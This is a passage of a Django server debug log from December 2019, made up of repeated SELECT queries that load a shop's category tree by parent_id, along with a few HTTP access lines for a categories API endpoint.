"shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-20 07:52:56,430 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-20 07:52:56,434 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-20 07:52:56,438 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-20 07:52:56,443 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-20 07:52:56,449 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-20 07:52:56,453 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-20 07:52:56,457 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-20 07:52:56,461 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-20 07:52:56,466 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-20 07:52:56,472 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-20 07:52:56,476 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-20 07:52:56,479 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-20 07:52:56,483 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-20 07:52:56,487 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-20 07:52:56,494 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-20 07:52:56,498 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-20 07:52:56,502 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-20 07:52:56,506 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-20 07:52:56,510 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-20 07:52:56,514 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-20 07:52:56,519 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-20 07:52:56,523 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-20 07:52:56,527 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-20 07:52:56,532 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-20 07:52:56,536 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [20/Dec/2019 07:52:56] "GET /api/v1/categories/ HTTP/1.0" 200 15396 [20/Dec/2019 07:53:13] "GET / HTTP/1.0" 302 0 [20/Dec/2019 07:55:08] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-20 07:55:26,664 utils 4252 140031503103744 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-20 07:55:26,671 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-20 07:55:26,675 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-20 07:55:26,677 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-20 07:55:26,680 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-20 07:55:26,682 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-20 07:55:26,685 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-20 07:55:26,687 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-20 07:55:26,689 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-20 07:55:26,693 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-20 07:55:26,695 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-20 07:55:26,697 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-20 07:55:26,700 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-20 07:55:26,702 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-20 07:55:26,705 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-20 07:55:26,707 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-20 07:55:26,709 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-20 07:55:26,712 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-20 07:55:26,714 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-20 07:55:26,718 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-20 07:55:26,720 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-20 07:55:26,722 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-20 07:55:26,724 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-20 07:55:26,727 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-20 07:55:26,729 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-20 07:55:26,732 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-20 07:55:26,735 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-20 07:55:26,737 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-20 07:55:26,739 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-20 07:55:26,741 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-20 07:55:26,745 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-20 07:55:26,747 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-20 07:55:26,749 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-20 07:55:26,751 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-20 07:55:26,754 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-20 07:55:26,757 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-20 07:55:26,760 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-20 07:55:26,762 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-20 07:55:26,764 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-20 07:55:26,766 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-20 07:55:26,769 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-20 07:55:26,771 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", 